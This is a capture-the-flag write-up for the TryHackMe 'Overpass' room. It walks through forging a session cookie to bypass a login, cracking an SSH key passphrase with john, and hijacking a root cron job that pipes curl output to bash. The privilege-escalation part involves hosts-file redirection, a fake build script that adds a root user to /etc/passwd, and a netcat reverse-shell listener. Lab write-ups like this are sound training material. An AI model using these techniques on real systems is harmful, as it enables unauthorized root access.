What happens when some broke CompSci students make a password manager?
Created by: NinjaJc01
nmap -p- -sV -Pn $IP -vv
The initial scan shows TCP ports
80 open. We’ll start enumerating the webpage.
We have what looks like potential usernames. Hey, who made szymex the head of security? That explains why this box is rated easy! 😸️
Looking at the source code (
downloads/src/overpass.go) there’s not anything we can enumerate. We do find a build script but more on that later.
Although it won’t get us any closer to solving the challenge… I had to give the program a go. It’s not quite the next gopass but I see some potential.
I used ffuf to do some basic fuzzing and within seconds we get some results. Let’s check out
/admin first. That looks interesting. Given this is an OWASP top 10 based challenge chances are we’ll run into an IDOR, command injection, broken authentication, or something.
🚀 ffuf -c -ic -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://10.10.246.219/FUZZ -t 100 -fc 401 -v
It’s all in the source
Not much here but that explains why we have Hello World sitting in our console.
Now we’re talking. Looking at the function
login there’s a simple if else statement. Basically, it’s checking if the response is equal to “Incorrect Crentials”. If true, it will display a message saying “Incorrect Credentials”. Otherwise, it will set a cookie named “SessionToken” to the returned statusOrCookie and redirect the user to /admin. Since this is only checking for a cookie named SessionToken let’s just create a cookie and give it a bogus value.
Read more about session management and cookies here: Owasp Cheatsheet
There are many methods to create or edit cookies. I’ll be using firefox’s dev console. There’s more browser extensions to count, curl, etc. Feel free to explore and find something that works for you.
To create a cookie you’ll simply hit the plus icon. The important thing is setting the name and the path. Since there’s nothing validating the cookie you can set the cookie value to whatever you want or leave it empty.
RSA Private Key
Now that we set our cookie we can reload the page and to redirected to
/admin. We’re greeted with an encrypted RSA private key. Based on the message we see it was created for
Since the RSA key is encrypted we’ll use
john to crack the hash. I saved the hash as
🚀 /usr/share/john/ssh2john.py id_rsa > id_rsa_hash
🚀 john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash
That didn’t take long. Now we can use the private key and the password we cracked to SSH into the box.
There’s user.txt. We also see a todo list. Hmm.. something about a build script.
As usual let’s upload linpeas on the target. I started a python http server and downloaded
Make the linpeas script executable using
chmod +x linpeas.sh then finally run linpeas and pipe it to tee to save the output with tee:
./linpeas.sh | tee peas.out
We spot a cronjob that’s trying to download a shell script using curl from overpass.thm then pipes it to bash.
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
So we now know there’s a cronjob running and we know what it does. We can trick curl to download a script we create called
buildscript.sh from our web server. In order for this to work we’ll need overpass.thm to resolve to our ip address. Good thing linpeas told us we can write to
vim /etc/hosts. Add your THM IP then comment our or delete 127.0.0.1 overpass.thm.
Now that we have overpass.thm resolving to our IP address we can create the directory structure to mimic the URL curl is requesting.
Create the directory structure and use vim to create the fake buildscript.sh script
mkdir -p downloads/src && vim buildscript.sh
buildscript.sh can do really whatever you want as it’s being piped to bash. Here’s an example to recursively
chmod the root directory and create a reverse shell. Obviously this is overkill but it should give you an idea of what you could do. My personal favorite one liner to create another root user:
echo "root2:`openssl passwd toor`:0:0:root:/root:/bin/bash" >> /etc/passwd
We have our fake script primed and ready. Spin up a python http server on port 80 in the
/overpass directory. The directory structure matters!
Start a netcat listener and catch a root shell.
rlwrap nc - lvnp 9001
We can also confirm
chmod -R 777 /root worked.
This was a nice easy room from NinjaJc01 that touches on a lot of fundamentals. Such as making sure to review any source code when enumerating. I look forward to doing the next box he develops. Wonderland 2? If you have any questions feel free to @ me in the THM discord. Thanks for the room James.